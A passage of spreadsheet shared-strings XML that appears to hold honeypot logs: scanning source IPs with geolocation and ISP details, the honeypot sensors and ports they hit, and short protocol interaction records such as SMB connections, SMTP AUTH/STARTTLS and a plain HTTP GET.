    <t>MT_SB&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>NA&amp;&amp;19321&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,65067)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,50069)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,50129)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,51075)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,11905)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,11924)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,12371)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,50584)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,51135)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,63378)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.136,63773)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:caa8:5788</t>
  </si>
  <si>
    <t>9b6ab29cba10876a080c6733069e5775</t>
  </si>
  <si>
    <t>117.253.235.92</t>
  </si>
  <si>
    <t>::ffff:75fd:eb5c</t>
  </si>
  <si>
    <t>e99f9d5cb3248b2f916890bd23e4b53e</t>
  </si>
  <si>
    <t>61.3.216.98</t>
  </si>
  <si>
    <t>::ffff:3d03:d862</t>
  </si>
  <si>
    <t>34f018c72e51751c8374a5963627aa8e</t>
  </si>
  <si>
    <t>116.72.68.36</t>
  </si>
  <si>
    <t>::ffff:7448:4424</t>
  </si>
  <si>
    <t>886db4860700646ddf48be02f79ebc9c</t>
  </si>
  <si>
    <t>37.220.123.125</t>
  </si>
  <si>
    <t>59102&amp;&amp;23</t>
  </si>
  <si>
    <t>31.9539</t>
  </si>
  <si>
    <t>9038</t>
  </si>
  <si>
    <t>Batelco Jordan</t>
  </si>
  <si>
    <t>Umniah Lil-Hawatef Al-Mutanaqelah Co</t>
  </si>
  <si>
    <t>Umniah Company</t>
  </si>
  <si>
    <t>2012-04-03</t>
  </si>
  <si>
    <t>::ffff:25dc:7b7d</t>
  </si>
  <si>
    <t>8b7b443eb07ccf4536e9f8bd4c77eedb</t>
  </si>
  <si>
    <t>223.185.55.103</t>
  </si>
  <si>
    <t>Ambala</t>
  </si>
  <si>
    <t>Nanhera</t>
  </si>
  <si>
    <t>10436804</t>
  </si>
  <si>
    <t>30.3192</t>
  </si>
  <si>
    <t>76.848</t>
  </si>
  <si>
    <t>::ffff:dfb9:3767</t>
  </si>
  <si>
    <t>3069d3a2bcd7a0f3867b6a8514c89a88</t>
  </si>
  <si>
    <t>120.62.118.168</t>
  </si>
  <si>
    <t>::ffff:783e:76a8</t>
  </si>
  <si>
    <t>4d51acace5aba27bf94b94070ba8156c</t>
  </si>
  <si>
    <t>116.88.66.163</t>
  </si>
  <si>
    <t>StarHub-Ltd-NGNBN-Services</t>
  </si>
  <si>
    <t>::ffff:7458:42a3</t>
  </si>
  <si>
    <t>f56df50fba3a7a5cdf7104c124920f39</t>
  </si>
  <si>
    <t>120.61.253.137</t>
  </si>
  <si>
    <t>::ffff:783d:fd89</t>
  </si>
  <si>
    <t>26e7124b479adf426af20b65aac56a7f</t>
  </si>
  <si>
    <t>117.204.225.71</t>
  </si>
  <si>
    <t>::ffff:75cc:e147</t>
  </si>
  <si>
    <t>e56a89a78ce00392b2e893e69524fa88</t>
  </si>
  <si>
    <t>117.195.136.211</t>
  </si>
  <si>
    <t>::ffff:75c3:88d3</t>
  </si>
  <si>
    <t>7b0d120a0eddcb27d0950b2a71b8fe68</t>
  </si>
  <si>
    <t>59.92.171.92</t>
  </si>
  <si>
    <t>::ffff:3b5c:ab5c</t>
  </si>
  <si>
    <t>e8570f5274b7b119714fecc87393c875</t>
  </si>
  <si>
    <t>179.251.248.6</t>
  </si>
  <si>
    <t>DF</t>
  </si>
  <si>
    <t>Federal District</t>
  </si>
  <si>
    <t>Brasília</t>
  </si>
  <si>
    <t>3469058</t>
  </si>
  <si>
    <t>-15.7797</t>
  </si>
  <si>
    <t>-47.9297</t>
  </si>
  <si>
    <t>26615</t>
  </si>
  <si>
    <t>TIM S/A</t>
  </si>
  <si>
    <t>::ffff:b3fb:f806</t>
  </si>
  <si>
    <t>5cd4a8947ea1bbc55b33b54859752de4</t>
  </si>
  <si>
    <t>117.251.176.96</t>
  </si>
  <si>
    <t>::ffff:75fb:b060</t>
  </si>
  <si>
    <t>f05c54c7b0cbfa61aabd3321dcf4cada</t>
  </si>
  <si>
    <t>59.93.18.229</t>
  </si>
  <si>
    <t>::ffff:3b5d:12e5</t>
  </si>
  <si>
    <t>723e756595b2bec70c2c07320754c3c6</t>
  </si>
  <si>
    <t>120.50.23.10</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_DNS_H32&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53&amp;&amp;15616&amp;&amp;53014&amp;&amp;51225&amp;&amp;54771&amp;&amp;55874&amp;&amp;50898&amp;&amp;51438&amp;&amp;61075&amp;&amp;51825&amp;&amp;61149&amp;&amp;64063&amp;&amp;54679&amp;&amp;NA</t>
  </si>
  <si>
    <t>Azimpur</t>
  </si>
  <si>
    <t>7701354</t>
  </si>
  <si>
    <t>23.7555</t>
  </si>
  <si>
    <t>90.3732</t>
  </si>
  <si>
    <t>38712</t>
  </si>
  <si>
    <t>TelNET Communication Ltd</t>
  </si>
  <si>
    <t>Telnet Communication Limited</t>
  </si>
  <si>
    <t>Telnet</t>
  </si>
  <si>
    <t>2008-03-20</t>
  </si>
  <si>
    <t>TELNETBD</t>
  </si>
  <si>
    <t>::ffff:7832:170a</t>
  </si>
  <si>
    <t>109f6636b205333b84a98ff4dbab34cb</t>
  </si>
  <si>
    <t>153.194.1.173</t>
  </si>
  <si>
    <t>p3512173-ipxg12901souka.saitama.ocn.ne.jp</t>
  </si>
  <si>
    <t>Saitama</t>
  </si>
  <si>
    <t>Sōka Shi</t>
  </si>
  <si>
    <t>Sōka</t>
  </si>
  <si>
    <t>1851604</t>
  </si>
  <si>
    <t>340-0043</t>
  </si>
  <si>
    <t>35.8254</t>
  </si>
  <si>
    <t>139.805</t>
  </si>
  <si>
    <t>OCN NTT Communications Corporation</t>
  </si>
  <si>
    <t>::ffff:99c2:1ad</t>
  </si>
  <si>
    <t>a1b3db9181446ba6e53baff75fdce7e2</t>
  </si>
  <si>
    <t>46.153.254.149</t>
  </si>
  <si>
    <t>35819</t>
  </si>
  <si>
    <t>Etihad Etisalat, a joint stock company</t>
  </si>
  <si>
    <t>Etihad Etisalat</t>
  </si>
  <si>
    <t>2010-10-26</t>
  </si>
  <si>
    <t>::ffff:2e99:fe95</t>
  </si>
  <si>
    <t>89fd099f9c4a3b5f092836a7f2f19f62</t>
  </si>
  <si>
    <t>100.42.94.249</t>
  </si>
  <si>
    <t>Hancock</t>
  </si>
  <si>
    <t>Kanawha</t>
  </si>
  <si>
    <t>4863204</t>
  </si>
  <si>
    <t>50447</t>
  </si>
  <si>
    <t>42.9377</t>
  </si>
  <si>
    <t>-93.7933</t>
  </si>
  <si>
    <t>62643</t>
  </si>
  <si>
    <t>Evertek, Inc</t>
  </si>
  <si>
    <t>2011-11-28</t>
  </si>
  <si>
    <t>EVERT-IPV4-2</t>
  </si>
  <si>
    <t>::ffff:642a:5ef9</t>
  </si>
  <si>
    <t>6445ba8fa678dd778777c40806ec6185</t>
  </si>
  <si>
    <t>120.56.86.251</t>
  </si>
  <si>
    <t>::ffff:7838:56fb</t>
  </si>
  <si>
    <t>d8deb7890eef29854de9e43f2fca92d4</t>
  </si>
  <si>
    <t>211.245.85.219</t>
  </si>
  <si>
    <t>Seoul (Namdaemunno 5(o)-ga)</t>
  </si>
  <si>
    <t>37.5562</t>
  </si>
  <si>
    <t>126.975</t>
  </si>
  <si>
    <t>2000-09-08</t>
  </si>
  <si>
    <t>::ffff:d3f5:55db</t>
  </si>
  <si>
    <t>ef82841b0fb62aadf50fc33aafdf749a</t>
  </si>
  <si>
    <t>165.154.203.201</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_H19</t>
  </si>
  <si>
    <t>25&amp;&amp;35904&amp;&amp;21&amp;&amp;6379&amp;&amp;23&amp;&amp;1433&amp;&amp;389&amp;&amp;110&amp;&amp;143&amp;&amp;5432&amp;&amp;1080&amp;&amp;1521&amp;&amp;80</t>
  </si>
  <si>
    <t>1993-06-18</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;command&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.74.222.213:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:a59a:cbc9</t>
  </si>
  <si>
    <t>7aa74f4629e2db57a21ac2732752998f</t>
  </si>
  <si>
    <t>162.216.241.197</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.162-216-241-197.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H24</t>
  </si>
  <si>
    <t>53146&amp;&amp;5900&amp;&amp;61619&amp;&amp;61332&amp;&amp;65269&amp;&amp;52800&amp;&amp;51718&amp;&amp;61192&amp;&amp;54425&amp;&amp;58318&amp;&amp;49548&amp;&amp;56606&amp;&amp;60288&amp;&amp;62603&amp;&amp;56779</t>
  </si>
  <si>
    <t>::ffff:a2d8:f1c5</t>
  </si>
  <si>
    <t>6ebeafaedacb0fa0694ceeb1b8b5d499</t>
  </si>
  <si>
    <t>162.216.241.248</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.162-216-241-248.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H32</t>
  </si>
  <si>
    <t>5900&amp;&amp;52963&amp;&amp;64111&amp;&amp;53704&amp;&amp;64966&amp;&amp;54770&amp;&amp;55795&amp;&amp;54481</t>
  </si>
  <si>
    <t>::ffff:a2d8:f1f8</t>
  </si>
  <si>
    <t>9c415acd79d0e27ef898aade216ae35d</t>
  </si>
  <si>
    <t>142.202.188.98</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.142-202-188-98.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_VNC_H27</t>
  </si>
  <si>
    <t>5900&amp;&amp;49512&amp;&amp;61706&amp;&amp;60607&amp;&amp;54671&amp;&amp;62876&amp;&amp;63485&amp;&amp;64624&amp;&amp;58126&amp;&amp;59395</t>
  </si>
  <si>
    <t>::ffff:8eca:bc62</t>
  </si>
  <si>
    <t>7704b99b54b7e506631bfcb0040f70a3</t>
  </si>
  <si>
    <t>113.180.53.146</t>
  </si>
  <si>
    <t>Bình Thuận Province</t>
  </si>
  <si>
    <t>Thành Phố Phan Thiết</t>
  </si>
  <si>
    <t>Phan Thiết</t>
  </si>
  <si>
    <t>1571058</t>
  </si>
  <si>
    <t>10.9289</t>
  </si>
  <si>
    <t>108.102</t>
  </si>
  <si>
    <t>::ffff:71b4:3592</t>
  </si>
  <si>
    <t>7afdc7d731cfa81c72888419d202d41b</t>
  </si>
  <si>
    <t>162.216.243.228</t>
  </si>
  <si>
    <t>NA&amp;&amp;unassigned.162-216-243-228.spryt.net</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H32</t>
  </si>
  <si>
    <t>5900&amp;&amp;49850&amp;&amp;52629&amp;&amp;50301</t>
  </si>
  <si>
    <t>::ffff:a2d8:f3e4</t>
  </si>
  <si>
    <t>719759428466fc60e821e7624a78cfd3</t>
  </si>
  <si>
    <t>180.219.70.123</t>
  </si>
  <si>
    <t>::ffff:b4db:467b</t>
  </si>
  <si>
    <t>6712a1948c38ded10ac14bb7d1705fd9</t>
  </si>
  <si>
    <t>117.200.163.140</t>
  </si>
  <si>
    <t>::ffff:75c8:a38c</t>
  </si>
  <si>
    <t>58abf6c5835cf65af022f42921af1c96</t>
  </si>
  <si>
    <t>117.233.227.93</t>
  </si>
  <si>
    <t>::ffff:75e9:e35d</t>
  </si>
  <si>
    <t>a1769ef3cdec4ddfe59c84bfe724bfd1</t>
  </si>
  <si>
    <t>84.241.26.96</t>
  </si>
  <si>
    <t>35.7837</t>
  </si>
  <si>
    <t>31549</t>
  </si>
  <si>
    <t>RASANA</t>
  </si>
  <si>
    <t>SHATEL Network</t>
  </si>
  <si>
    <t>Shatel Group</t>
  </si>
  <si>
    <t>::ffff:54f1:1a60</t>
  </si>
  <si>
    <t>82193c7475b7bf0d245d5f414a307b34</t>
  </si>
  <si>
    <t>106.211.231.231</t>
  </si>
  <si>
    <t>45609</t>
  </si>
  <si>
    <t>::ffff:6ad3:e7e7</t>
  </si>
  <si>
    <t>778a6d1c4af07cb8eabb33bcae0ba30b</t>
  </si>
  <si>
    <t>117.202.152.75</t>
  </si>
  <si>
    <t>::ffff:75ca:984b</t>
  </si>
  <si>
    <t>e922fba0caa8348ade27b4c378580f63</t>
  </si>
  <si>
    <t>117.255.108.220</t>
  </si>
  <si>
    <t>::ffff:75ff:6cdc</t>
  </si>
  <si>
    <t>8a4a7197c4d9d402e6a4483e00a7fc7e</t>
  </si>
  <si>
    <t>117.233.203.10</t>
  </si>
  <si>
    <t>::ffff:75e9:cb0a</t>
  </si>
  <si>
    <t>ebd1cf13072f6810681d965861511a32</t>
  </si>
  <si>
    <t>1.2.141.247</t>
  </si>
  <si>
    <t>node-2rb.pool-1-2.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>2019-05-14 09:00:25</t>
  </si>
  <si>
    <t>2026-05-14 09:00:25</t>
  </si>
  <si>
    <t>2023-05-18 14:44:23</t>
  </si>
  <si>
    <t>['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']</t>
  </si>
  <si>
    <t>::ffff:102:8df7</t>
  </si>
  <si>
    <t>18bc9beeb5ae5a56cee7d971d4c5b26e</t>
  </si>
  <si>
    <t>59.180.172.202</t>
  </si>
  <si>
    <t>60083&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:3bb4:acca</t>
  </si>
  <si>
    <t>6468f73c46be3a47455acb838b005ba7</t>
  </si>
  <si>
    <t>117.251.166.61</t>
  </si>
  <si>
    <t>::ffff:75fb:a63d</t>
  </si>
  <si>
    <t>6ea06eb40111a484997bb9b07681ef34</t>
  </si>
  <si>
    <t>153.137.78.14</t>
  </si>
  <si>
    <t>NA&amp;&amp;p2238014-ipxg00c01fukuokachu.fukuoka.ocn.ne.jp</t>
  </si>
  <si>
    <t>abuseipdb&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:9989:4e0e</t>
  </si>
  <si>
    <t>7bd8e98e804962e297aed98aed7d4d81</t>
  </si>
  <si>
    <t>117.204.131.14</t>
  </si>
  <si>
    <t>::ffff:75cc:830e</t>
  </si>
  <si>
    <t>f9a6fb908a84e76ea441a9d9417747b6</t>
  </si>
  <si>
    <t>117.207.253.123</t>
  </si>
  <si>
    <t>::ffff:75cf:fd7b</t>
  </si>
  <si>
    <t>ac4d7cfad9f149f3330d8623fbcbfc8d</t>
  </si>
  <si>
    <t>103.58.64.181</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>Sivaganga</t>
  </si>
  <si>
    <t>Kanadukattan</t>
  </si>
  <si>
    <t>1268197</t>
  </si>
  <si>
    <t>10.1721</t>
  </si>
  <si>
    <t>78.7794</t>
  </si>
  <si>
    <t>2015-05-23</t>
  </si>
  <si>
    <t>IMPERIAL</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.58.64.181,52976)}</t>
  </si>
  <si>
    <t>::ffff:673a:40b5</t>
  </si>
  <si>
    <t>2c80f38f8590ba30b33bd777646fc53d</t>
  </si>
  <si>
    <t>117.232.8.179</t>
  </si>
  <si>
    <t>::ffff:75e8:8b3</t>
  </si>
  <si>
    <t>c13a874d6f576f87967f61ff5e1ed23b</t>
  </si>
  <si>
    <t>77.0.98.46</t>
  </si>
  <si>
    <t>dynamic-077-000-098-046.77.0.pool.telefonica.de</t>
  </si>
  <si>
    <t>NI</t>
  </si>
  <si>
    <t>Lower Saxony</t>
  </si>
  <si>
    <t>Rosdorf</t>
  </si>
  <si>
    <t>2845131</t>
  </si>
  <si>
    <t>51.5</t>
  </si>
  <si>
    <t>9.9</t>
  </si>
  <si>
    <t>6805</t>
  </si>
  <si>
    <t>TDDE-ASN1</t>
  </si>
  <si>
    <t>Telefonica Deutschland GmbH</t>
  </si>
  <si>
    <t>Telefonica O2 Germany GmbH &amp; Co.</t>
  </si>
  <si>
    <t>::ffff:4d00:622e</t>
  </si>
  <si>
    <t>1f031a573de24e9b12ac45294e4b51f1</t>
  </si>
  <si>
    <t>186.50.70.171</t>
  </si>
  <si>
    <t>r186-50-70-171.dialup.adsl.anteldata.net.uy&amp;&amp;NA</t>
  </si>
  <si>
    <t>Canelones</t>
  </si>
  <si>
    <t>3442098</t>
  </si>
  <si>
    <t>-34.7603</t>
  </si>
  <si>
    <t>-56.2259</t>
  </si>
  <si>
    <t>::ffff:ba32:46ab</t>
  </si>
  <si>
    <t>4c3e4edfca2a4423fe6bd911fe7cd325</t>
  </si>
  <si>
    <t>68.15.18.147</t>
  </si>
  <si>
    <t>NA&amp;&amp;wsip-68-15-18-147.sd.sd.cox.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H35&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_PJL_H3&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SOCKS5_H42&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MT-CPA_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;35461&amp;&amp;42033&amp;&amp;48537&amp;&amp;80&amp;&amp;5900&amp;&amp;9100&amp;&amp;143&amp;&amp;5432&amp;&amp;443&amp;&amp;445&amp;&amp;1080&amp;&amp;43422&amp;&amp;46818&amp;&amp;52008&amp;&amp;50952&amp;&amp;49693&amp;&amp;53360&amp;&amp;39985&amp;&amp;48924&amp;&amp;55336&amp;&amp;60095&amp;&amp;NA&amp;&amp;55633&amp;&amp;34402&amp;&amp;36118&amp;&amp;52368</t>
  </si>
  <si>
    <t>San Diego</t>
  </si>
  <si>
    <t>5391811</t>
  </si>
  <si>
    <t>92101</t>
  </si>
  <si>
    <t>32.7157</t>
  </si>
  <si>
    <t>-117.161</t>
  </si>
  <si>
    <t>22773</t>
  </si>
  <si>
    <t>Cox Communications Inc.</t>
  </si>
  <si>
    <t>Cox Communications Inc</t>
  </si>
  <si>
    <t>::ffff:440f:1293</t>
  </si>
  <si>
    <t>b0a7633f515688172d94a27a28ef1e76</t>
  </si>
  <si>
    <t>95.42.53.27</t>
  </si>
  <si>
    <t>95-42-53-27.ip.btc-net.bg&amp;&amp;NA</t>
  </si>
  <si>
    <t>42.6977</t>
  </si>
  <si>
    <t>23.3219</t>
  </si>
  <si>
    <t>BTC Plc</t>
  </si>
  <si>
    <t>::ffff:5f2a:351b</t>
  </si>
  <si>
    <t>3084526324f439a19792b7fd7be774a3</t>
  </si>
  <si>
    <t>117.205.156.184</t>
  </si>
  <si>
    <t>::ffff:75cd:9cb8</t>
  </si>
  <si>
    <t>8ef5460304917e6cc9d523779c2ac1b5</t>
  </si>
  <si>
    <t>59.93.14.247</t>
  </si>
  <si>
    <t>::ffff:3b5d:ef7</t>
  </si>
  <si>
    <t>5b92222f046800ddf409904830cee871</t>
  </si>
  <si>
    <t>103.249.235.12</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_MT-CPA_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;3306&amp;&amp;5900&amp;&amp;5060&amp;&amp;3389&amp;&amp;1433&amp;&amp;1080&amp;&amp;9100&amp;&amp;30079</t>
  </si>
  <si>
    <t>Ahmedabad (Shahibaugh)</t>
  </si>
  <si>
    <t>23.0591</t>
  </si>
  <si>
    <t>72.5875</t>
  </si>
  <si>
    <t>ANTRIKSSH CABLE SERVICES Pvt. Ltd</t>
  </si>
  <si>
    <t>2013-06-12</t>
  </si>
  <si>
    <t>::ffff:67f9:eb0c</t>
  </si>
  <si>
